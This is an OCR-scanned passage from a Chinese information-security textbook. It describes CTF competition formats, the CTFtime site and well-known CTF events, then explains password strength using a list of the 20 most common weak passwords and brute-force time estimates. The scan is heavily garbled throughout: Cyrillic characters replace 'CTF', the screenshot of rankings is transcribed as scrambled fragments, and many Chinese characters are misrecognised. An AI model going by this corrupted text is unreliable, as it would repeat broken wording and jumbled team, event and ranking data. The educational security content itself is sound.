中 ， 不 仅仅 是 比 参 赛 队 员 的 智力 和 技术 ， 由 于 时 间 较 长 ， 所 以 对 成 员 的 体力 要 求 也 比较 车 
刻 ， 同 时 也 是 对 团队 之 间 的 分 工 配合 与 合作 的 考验 。 


3. 混合 模式 


混合 模式 是 结合 了 解 题 模 式 和 攻防 模式 的 新 型 CTF 竞 赛 模式 ， 现 已 被 越 来 越 多 的 比赛 采 
用 ， 由 于 其 可 以 发 挥 团队 成 员 在 各 个 领域 的 专长 ， 这 种 新 的 范 赛 模式 被 越 来 越 多 的 人 所 接受 。 


~ 


10.12 ”知名 CTF 竞 赛 


在 介绍 知名 CTF 竞 赛 之 前 ， 先 来 认识 一 个 网 站 一 一 CTFTIME (https: //ctftime. 
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org/) ， 如 图 10-1 所 示 ， 这 是 一 个 比较 全 面 提供 CTF 信 息 的 网 站 。 


Y CTFtime.org / All about х № 

= > Ç ËB https://ctftime.org 

Мое masma) qS, 开始 
Team rating Past events a 


НҢ Altay СТЕ 2015 
六 月 22 18:00 UTC | Bamaul, Russian Federation 


2015 2014 2013 2012 2011 


HITB CTF Amsterdam 2015 
АВ 29, 15:00 UTC | Amsterdam, The Netherlands 


Place Team Country Rating 


“1 Plaid Parliament of Pwning 975.183 
Place Team Country Points 
2 Oops 643 015 
м1 StratumAuhuur = 40.000 
Огадоп Sector 588 082 
2 «ша 
Gallopsled 577 427 
3 hack ERS 
464 655 


20 teams tota asks and wnteups 


PHD CTF Finals 2015 
АА 27, 1500 UTC | Moscow, Russia 


453 102 


ISpamAndHex 449 797 


=i 

Lal 

Кы 

= 

blue-lotus | 
= 

- | 

ва 


217 390.529 


Place Team 


3 

4 

5 

6 dcua 

7 

8 
Country Points 

9 


Tasteless 372 674 


1 More Smoked Leet = 20.000 


1 Samurai Е 346 926 Chicken 


ReallyNonamesFor 12.726 
Full rating | Rating iormula 
. Rdot.org 9.707 
Upcoming events =» 
Format Name Date Duration 
PoliGTF 2015 +R 10. 
© Onine 2015 09.00 
09:00 UTC 


图 10-1 CTFTIME 网 站 


2а Oh 


根据 CITFTIME 网 站 的 总 结 ， 国 际 知名 赛事 如 下 。 


v V Vv у Vv у у у v v v 


> 


DEFCON CTF: CTF 赛 事 中 的 “世界 杯 ” 

UCSB ІСТЕ: 来 自 UCSB 的 面 向 世界 高 校 的 CTF。 

Plaid СТЕ: 包抄 多 项 赛事 冠军 的 CMU 的 PPP 团 队 举 办 的 在 线 解 题 赛 。 

Boston Key Party: 近年 来 崛起 的 在 线 解 题 赛 。 

ХХСЗ СТЕ: 欧洲 历史 最 悠久 CCC 黑 客 大 会 举办 的 CTF。 

SIGINT СТЕ: 德国 CCCAC 协 会 另 一 场 解 题 模式 竞赛 。 

Hack.lu СТЕ: 卢森堡 黑客 会 议 同期 举办 的 CTF。 

EBCTF: 由 和 荷兰 老牌 强 队 Eindbazen 组 织 。 

Ghost in the Shellcode: 由 Marauders 和 Men in Black Hats 共 同 组 织 的 在 线 解 题 赛 。 
RwthCTF: 由 德国 OldEurOpe 组 织 的 在 线 攻防 赛 。 

RuCTF: 由 俄罗斯 Hackerdom 组 织 ， 解 题 模式 资格 赛 面 向 全 球 参赛 ， 混 合 模式 的 决 
赛 面向 俄罗斯 队伍 的 国家 级 竞赛 。 

RuCTFe: 由 俄罗斯 Hackerdom 组 织 的 面向 全 球 的 在 线 攻 防 赛 。 

РНР СТЕ: 俄罗斯 Positive Hacking Day 会 议 同期 举办 的 CTF。 


国内 知名 赛事 如 下 。 


> 


XCTF 全 国联 赛 ; 中 国 网 络 空 间 安 全 协会 竞 评 演练 工作 组 主办 、 南 京 赛 宁 承办 、 
KEEN TEAM 协 办 的 全 国 ' 性 网 络 安 全 赛事 平台 ，2014 一 2015 赛 季 五 站 选拔 赛 分 别 由 
清华 、 上 交 、 浙 大 、 杭 电 和 成 信 技 术 团 队 组 织 (包括 杭 电 HCTF、 上 成 信 SCTF、 清 


Ех 
华 BCTF、 上 交 OCTF 和 浙大 ACTF) ，XCTF 联 赛 总 决赛 由 蓝 莲 花 战队 组 织 ， 是 国 
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内 最 权威 、 最 高 技术 水 平 与 最 大 影响 力 的 CTF 赛 事 平台 。 
АПСТЕ: 由 阿里 巴巴 公司 组 织 ， 面 向 在 校 学 生 的 CTF 竞 赛 ， 冠 军 奖 金 10 万 元 加 


ү 


BlackHat 全 程 费 用 。 

> ХОСТЕ: 由 西安 电子 科技 大 学 信息 安全 协会 组 织 的 CTF 竞 赛 ， 其 特点 是 偏向 于 渗 
透 实战 经 验 。 

> НСТЕ: 由 杭州 电子 科技 大 学 信息 承办 组 织 的 CTF。 

> ISCC: 由 北 理工 组 织 的 传统 网 竞赛 ,最近 两 年 逐渐 转向 CTF 赛 制 。 


10.1.3 ”如何 开局 CTF 之 旅 


由 于 CTF 大 赛 中 含有 几乎 所 有 的 信息 安全 知识 《二进制 程序 的 逆向 分 析 、 二 进 制程 序 
的 漏洞 挖掘 与 利用 、 操 作 系统 内 核 安 人 全、 移动 安全 〈 安 早 逆 问 与 漏洞 分 机 、IOS 逆 加 与 漏 
洞 分 析 ) 、 网 络 协议 分 析 、Web 攻 击 、Web 日 志 审计 与 分 析 、 隐 写 术 、 密 码 学 应 用 、 路 由 
器 漏洞 利用 、ACM 编 程 、 各 种 环境 的 取证 分 析 等 ) ， 所 以 十 分 适合 基础 扎实 的 安全 技术 
爱好 者 。 

如 果 只 是 基础 扎实 可 没 法 玩 转 CTF， 还 需要 对 各 个 方面 知识 的 深入 理解 和 应 用 。 安 全 
是 一 门 偏重 应 用 的 学 科 ， 很 多 安全 问题 并 不 是 出 在 理论 不 健全 上 ， 而 是 在 实施 的 时 候 出 
了 这 样 那样 的 问题 。 碰 到 不 懂 的 问题 ， 不 能 看 了 别人 写 的 Writeup 《Writeup 的 字面 含义 是 
“新 手 必 看 ”， 在 CTF 竞 赛 中 ， 参 赛 选 手 解 题 的 思路 及 过 程 被 称 为 Writeup， 通 常用 于 记录 
和 交流 ， 供 他 人 学 习 等 ) 就 觉得 自己 也 会 了 ， 一 定 要 自己 动手 实践 。 


10.1.4 一 些 经 验 


对 于 还 没 参加 过 线 下 CTF 况 赛 的 笔者 来 说 ， 专 门 请 教 了 茶 知名 “ 赛 棍 ”〔 对 资深 选手 
的 昵称 ) ， 总 结 了 一 些 经 验 分 享 给 大 家 。 

第 一 ， 解 题 型 的 比赛 一 定 不 要 在 一 道 题目 上 卡 太 久 ， 随 时 把 思路 记录 下 来 ， 暂 时 没有 
思路 就 去 尝试 一 下 其 他 题目 ， 然 后 再 回来 继续 。 

第 二 ， 面 对 国内 的 比赛 时 ， 脑 洞 一 定 要 大 ， 因 为 国内 很 多 出 题 人 还 控制 不 好 难度 高 和 
脑 洞 大 之 间 的 区 别 ， 一 定 要 发 散 思 维 。 

第 三 ， 平 时 见 到 好 的 文章 技巧 ， 或 者 目 己 踩 过 的 “ 坑 ”， 一 定 要 全 部 记 在 一 个 小 本 上 
方便 查阅 ， 不 然 很 可 能 有 的 “ 坑 ” 还 要 掉 第 二 次 。 

第 四 ， 终 问 一 定 要 美化 ， 不 然 做 题 的 效率 会 非常 低 。 

第 五 ， 很 多 Web 的 问题 ， 其 实在 想 明 白 之 后 都 是 可 以 在 本 地 搭 环境 调试 或 者 fuzz( 模 
糊 测 试 ) 的 ， 千 万 不 要 不 动手 。 

第 六 ， 一 定 要 多 回 搜 索引 擎 请 教 。 

读者 在 学 习 了 安全 的 基础 知识 ， 了 解 了 一 些 基 本 技巧 和 经 验 之 后 ， 就 可 以 开始 目 己 的 
CTF 之 旅 了 。 
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密码 安全 问题 确实 是 计算 机 安全 中 十 分 重要 上 且 大 多 数 人 无 法 有 效 解决 的 严重 问题 。 
我 们 发 现 越 来 越 多 的 地 方 需要 设置 密码 ， 甚 至 有 些 地 方 同 时 需要 多 个 密码 来 确保 安全 〈 例 
如 登录 密码 和 支付 密码 ) ， 这 就 使 我 们 陷入 了 两 难 的 境地 一 一 设置 简单 好 记 的 密码 不 够 安 
全 ， 但 相对 安全 的 复杂 密码 又 实在 难以 记忆 。 

针对 这 个 问题 ， 最 好 的 解决 方法 就 是 了 解 攻 击 者 的 攻击 思路 以 及 手段 ， 有 针对 性 地 设 
置 强度 高 但 又 不 至 于 难以 记忆 的 系列 密码 。 这 么 说 可 能 有 点 抽象 ， 接 下 来 ， 让 我 们 从 弱 口 
令 开始 ， 一 点 点 地 开始 分 析 。 

这 里 先 列 出 一 些 密码 ， 请 找 找 有 没有 上 自己 熟悉 的 密码 ? 

123456 

123456789 

12345678 

111111 

123123 

11111111 

5201314 

000000 

123321 

00000000 

1234567890 

123123123 

1314520 

1234567 

12345 

666666 

88888888 

888888 

654321 

112233 

如 果 不 出 所 料 的 话 ， 大 部 分 人 的 某 些 账号 ， 正 是 用 着 这 些 密码 的 其 中 之 一 。 

我 们 通过 搜集 尽量 多 (虽然 相对 于 整个 密码 体系 来 说 还 不 算 多 ， 但 大 体 上 可 以 反映 概 
率 水 平 ) 、 足 够 全 面 的 密码 样本 ， 并 且 通 过 脚本 分 析 ， 计 算出 它们 出 现 的 概率 ， 总 结 出 20 
个 “最 弱 ” 的 密码 ， 评 判 标准 是 它们 出 现 的 频率 ， 如 附 图 1 所 示 。 

相信 大 部 分 人 都 能 在 其 中 找到 目 己 现在 或 是 曾经 使 用 过 的 密码 ， 但 你 可 曾 想 过 它们 是 
有 多 么 不 安全 ? 下 面 不 妨 来 简单 做 一 些 计算 。 

假设 计算 机 每 秒 可 以 尝试 一 百 次 输入 密码 并 立刻 判断 正 误 的 能 力 ， 那 么 位 于 榜首 的 
6 位 纯 数 字 密 码 大 约 需 要 2 小 时 45 分 钟 即 可 全 部 穷 举 (000000—999999) 。 也 就 是 说 ， 最 
多 2 小 时 45 分 钟 后 ， 密 码 就 会 被 破解 ， 不 过 我 们 接着 往 下 看 ， 位 列 第 二 的 “123456789” 
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所 代表 的 9 位 纯 数字 密码 被 穷 举 所 需 的 时 间 大 约 是 115 天 还 要 多 ， 不 过 这 是 否 可 以 说 明 它 
就 是 安全 的 了 呢 ?” 大 家 当然 知道 答案 : 当然 不 是 一 一 因为 人 们 的 假设 是 随机 9 位 数字 ， 而 
123456789 属 于 规律 数字 ， 很 容易 被 人 为 破解 。 


文件 ( ”编辑 (E) WRO ЕМУ) 帮助 {H) 
0. 174270290071 


0. 075297329078 
0. 044501870922 
0. 0298642716312 
0. 0169782148936 
0. 0156901446808 
0. 0137360198582 
0. 00766271276595 
0. 0066593390071 
0. 00657954609929 
0. 00629397021277 
0. 00560862624113 
0. 00508852624113 
0. 0049864539007 
0. 00495495460993 
0. 00485650141844 
0. 00480289574468 
0. 0038556858156 
0. 00324844680851 
0. 00307217943262 


附 图 1 脚本 统计 输出 结果 

因为 这 些 弱 密码 本 身 的 特性 ， 人 们 第 利 会 在 密码 中 加 入 一 些 其 他 元 素 ， 例 如 字母 、 
符号 等 。 一 个 数字 和 英文 字母 (大 小 写 均 可 ) 组 合 的 6 位 密码 ， 按 照 之 前 的 条 件 需 要 18 年 
以 上 的 时 间 才 能 穷 举 完毕 ! 如 果 再 增加 一 位 ， 束 需要 上 千年 的 时 间 来 穷 举 ， 基 本 可 以 认定 
为 暂时 “无 法 穷 举 ”的 密码 〈 随 着 计算 机 计算 性 能 的 提高 ， 所 需 时 间 无 疑 会 不 断 缩短 ， 我 
们 甚至 可 以 预料 到 ， 当 计算 机 计算 能 力 达 到 极限 时 ， 无 论 多 么 复杂 的 密码 都 无 法 摆脱 被 穷 
举 出 来 的 命运 ， 这 时 ， 人 们 就 需要 密码 之 外 的 “外 力 ” 来 干涉 密码 安全 了 。 后 文 会 详细 分 
HT) 。 但 机 需 毕 竞 不 是 恶意 攻击 的 来 源 ， 发 动 恶 意 攻 击 的 是 不 怀 好 意 的 人 ， 他 们 虽 无 法 拥 
有 计算 机 的 强大 计算 能 力 ， 但 他 们 可 以 通过 分 析 来 推导 出 密码 ， 例 如 : 你 的 名 字 叫 张 三 ， 
那么 你 的 密码 极 有 可 能 含有 “ZS” 两 个 字母 ， 如 果 得 知 了 你 的 生日 ， 那 么 攻击 者 又 可 以 
尝试 很 多 种 组 合 ， 如 果 你 的 密码 恰巧 是 这 些 组 合 中 的 一 种 ， 那 么 你 的 密码 依旧 处 于 危险 
之 中 。 

既然 我 们 的 密码 如 此 不 安全 ， 为 什么 密码 被 破解 的 却 只 是 少数 中 的 少数 呢 ? 这 就 是 
因为 我 所 说 的 “外 力 ” 的 存在 。 回 忆 一 下 ， 茶 些 时 候 在 错误 输入 茶 个 密码 时 ， 第 2 次 输入 
和 第 一 次 有 什么 不 一 样 ? 没 错 ! 那 就 是 验证 码 。 现 如 今 ， 很 多 网 站 都 要 求 在 输入 密码 后 输 
入 验证 码 。 顾 名 思 义 ，“ 验 证 码 ” 就 是 验证 是 盏 为 机 器 的 识别 码 ， 优 秀 的 验证 码 需要 做 到 
“人 类 可 以 分 辨 但 机 器 无 法 分 辨 ”。 这 样 ， 之 前 假设 “计算 机 每 秒 进行 一 百 次 破解 ”就 无 
法 成 立 了 。 

在 知道 密码 有 多 不 安全 之 后 ， 下 面 就 要 来 说 一 说 如 何 让 密码 变 得 安全 了 。 

人 们 总 是 会 陷入 前 文 押 提 到 的 这 样 一 个 循环 一 一 容易 记忆 的 密码 不 够 安全 ， 足 够 安全 
的 密 但 却 又 很 难 记忆 。 人 们 拥有 看 成 百 上 干 的 账号 与 密码 ， 想 做 到 一 一 对 应 地 全 部 记 住 ， 
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实在 比较 困难 。 有 些 人 甚至 为 了 图 省 事 ， 将 所 有 密码 都 设置 为 同一 个 ， 结 条 一 处 密码 涝 
露 ， 导 致 此 人 整个 网 络 系统 的 裔 省 。 

如 何 根据 网 站 的 重要 性 与 安全 性 来 设置 相应 的 密码 ， 是 密码 安全 中 十 分 重要 的 一 环 。 
需要 密码 的 账号 大 体 上 分 为 两 类 一 一 相对 安全 的 和 比较 不 安全 的 。 相 对 安全 是 指 该 网 站 用 
户 数量 极其 庞大 ， 本 身 的 安全 措施 非常 严 苛 ， 这 样 的 网 站 安全 性 较 好 ， 不 容易 泄露 ， 应 使 
用 目 己 熟悉 的 密码 但 不 是 可 以 被 穷 举 或 人 为 猜 解 的 弱 口 令 ) 。 比 较 不 安全 是 指 一 些 名 气 
较 低 ， 无 法 确定 安全 性 的 网 站 ， 这 时 如 果 使 用 含有 可 能 透露 目 己 身份 信息 例如 名 字 首 字 
母 、 生 日 等 ) 的 密码 ， 一 旦 泄露 ， “后遗症 ”将 不 堪 设 想 。 此 时 设置 一 个 便于 记忆 ， 难 于 
破解 的 又 与 目 己 无 关 的 密码 ， 才 是 明智 之 举 。 

除了 密码 本 身 ， 有 些 为 了 方便 用 户 的 功能 也 会 成 为 安全 隐患 ， 例 如 入 们 所 熟知 的 一 种 
功能 一 一 密码 找 回 ， 密 码 找 回 旨 在 通过 发 送 右键 /短信 等 来 验证 所 绑 定 的 身份 ， 从 而 在 不 
知道 原 密 码 的 情况 下 直接 修改 密码 。 当 人 们 息 记 目 己 密码 时 ， 这 确实 很 用， 假如 这 些 吴 
份 验证 信息 落 入 他 人 之 手 《〈 例 如 邮箱 账号 被 盗 取 ) ， 那 么 威胁 到 的 是 你 环 环 相 扣 的 整个 密 
码 体系 。 


本 节 只 介绍 了 一 些 非常 基础 的 密码 安全 知识 ， 相 对 复杂 的 《例如 网 上 银行 ) 密码 体系 
需要 较 大 的 篇 幅 才 能 讲 清楚 。 项 望 通过 这 一 小 节 ， 和 帮助 读者 朋友 们 了 解密 码 的 重要 性 ， 遵 
循 密码 安全 人 策略， 提升 防范 意识 ， 防 范 个 人 信息 与 财产 等 受到 威胁 和 攻击 。 
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